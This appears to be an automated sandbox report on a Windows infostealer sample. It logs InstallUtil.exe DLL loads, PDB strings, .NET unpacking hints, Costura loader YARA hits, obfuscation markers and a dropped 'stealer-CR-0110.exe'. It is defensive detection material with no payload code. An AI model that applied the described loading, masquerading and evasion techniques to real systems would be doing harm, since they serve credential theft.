Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\849128312.cmd.Fjz

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\849128312.cmd.Fjz

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb9 source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbH source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006711000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2224438229.0000000009270000.00000004.08000000.00040000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ((.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\InstallUtil.pdbH source: InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: usymbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb\h source: InstallUtil.exe, 0000000D.00000002.4545766049.0000000004F99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006711000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2224438229.0000000009270000.00000004.08000000.00040000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp, stealer-CR-0110.exe, 00000008.00000002.2211271521.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb*C source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb2 source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2192046341.0000000006653000.00000004.00000800.00020000.00000000.sdmp, 849128312.cmd.Fjz, 00000007.00000002.2217877802.0000000008820000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4570717346.0000000005C44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdbz source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\InstallUtil.pdb'9 source: InstallUtil.exe, 0000000D.00000002.4532284411.0000000000983000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\InstallUtil.pdbn source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb.NETFrameworkv4.0.30319InstallUtil.exe source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.00000000009E4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\InstallUtil.pdbc source: InstallUtil.exe, 0000000D.00000002.4532284411.000000000095D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbKj source: InstallUtil.exe, 0000000D.00000002.4545766049.0000000004F99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDBl source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: InstallUtil.exe, 00000009.00000002.4531112270.00000000010ED000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C44000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbBC source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powershell.pdbUGP source: 849128312.cmd.Fjz, 00000007.00000000.2063200519.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, 849128312.cmd.Fjz.4.dr
Source:	Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb8W source: InstallUtil.exe, 0000000D.00000002.4530525636.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: powershell.pdb source: 849128312.cmd.Fjz, 00000007.00000000.2063200519.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, 849128312.cmd.Fjz.4.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb? source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4530627422.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000009.00000002.4570717346.0000000005C4E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 0000000D.00000002.4532284411.00000000009B3000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 7.2.849128312.cmd.Fjz.6653a98.8.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 7.2.849128312.cmd.Fjz.6653a98.8.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 7.2.849128312.cmd.Fjz.6653a98.8.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 7.2.849128312.cmd.Fjz.6653a98.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 7.2.849128312.cmd.Fjz.6653a98.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 7.2.849128312.cmd.Fjz.4e17544.5.raw.unpack, GetterBroadcasterConsumer.cs	.Net Code: TestToken System.AppDomain.Load(byte[])

Yara detected Costura Assembly Loader

Source: Yara match	File source: 7.2.849128312.cmd.Fjz.6589638.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.849128312.cmd.Fjz.87c0000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.stealer-CR-0110.exe.7130000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.849128312.cmd.Fjz.63e2288.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2241217734.0000000007130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2217536851.00000000087C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2173518865.0000000004EEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2211271521.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2192046341.0000000005EDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 849128312.cmd.Fjz PID: 6640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: stealer-CR-0110.exe PID: 6396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 4284, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6020, type: MEMORYSTR

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06D8B6EA push es; ret	7_2_06D8B718
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06D894E9 push es; ret	7_2_06D894EC
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06D83BDB push es; ret	7_2_06D83BDC
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DBE738 push es; ret	7_2_06DBE7F0
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DB850F push es; retf	7_2_06DB851C
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DB6086 push ecx; ret	7_2_06DB6089
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DB89E3 push es; retf	7_2_06DB89F4
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DF440D push FFFFFF8Bh; iretd	7_2_06DF440F
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DF4535 push FFFFFF8Bh; iretd	7_2_06DF4537
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DF43F3 push FFFFFF8Bh; ret	7_2_06DF43F8
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_06DF43B9 push FFFFFF8Bh; ret	7_2_06DF43BE
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_074504A9 push eax; iretd	7_2_074504C1
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E3F50C pushfd ; ret	7_2_08E3F50D
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E5B2FF push ebx; retf	7_2_08E5B300
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Code function: 7_2_08E5472D push eax; iretd	7_2_08E5472E
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_02648DF5 push B8FFFF9Fh; iretd	8_2_02648DFA
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_0495C3C0 push ebp; ret	8_2_0495C3C1
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D644D8 pushfd ; retf	8_2_05D644D9
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05D68250 pushad ; iretd	8_2_05D68251
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_05DA54E0 push FFFFFF80h; ret	8_2_05DA54E4
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_07097C29 push edx; ret	8_2_07097C2A
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Code function: 8_2_07097033 push edx; iretd	8_2_07097036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 13_2_025D0743 pushad ; retf	13_2_025D07A5

Source: 7.2.849128312.cmd.Fjz.86e0000.18.raw.unpack, s1o4cko7nwCvsxsaJYt.cs

High entropy of concatenated method names: 'o57o1x5t9T', 'TDAYMERSj7Lmu7YpXMf', 'hA7Y6ZRP5r4kgKjmXfc', 'jNK70YRG8BePVhDLtFS', 'a2C4pqR4Exva4GHXvnn', 'DE3eUpRX1qDxPSH9axv', 'puvo6MRwxNHFuScM0vk', 'Tns9CyRlFsrm5ggVcjT'

Drops PE files

Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\Desktop\849128312.cmd.Fjz			Jump to dropped file
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	File created: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe			Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\System32\xcopy.exe

File created: C:\Users\user\Desktop\849128312.cmd.Fjz

Jump to dropped file

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process information set: NOOPENFILEERRORBOX	Jump to behavior
